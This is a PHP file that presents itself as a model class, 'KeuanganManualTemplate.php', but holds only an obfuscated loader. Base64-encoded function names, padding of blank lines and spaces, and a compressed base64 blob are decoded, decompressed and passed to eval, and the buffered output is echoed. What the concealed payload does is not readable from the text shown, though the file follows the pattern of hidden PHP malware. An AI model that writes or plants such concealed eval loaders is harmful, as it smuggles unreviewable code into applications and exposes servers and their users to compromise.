<?php 
        $__='printf';$_='Loading app/Models/KeuanganManualTemplate.php';
        























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































                                                                                                                                                                                                                     $________;
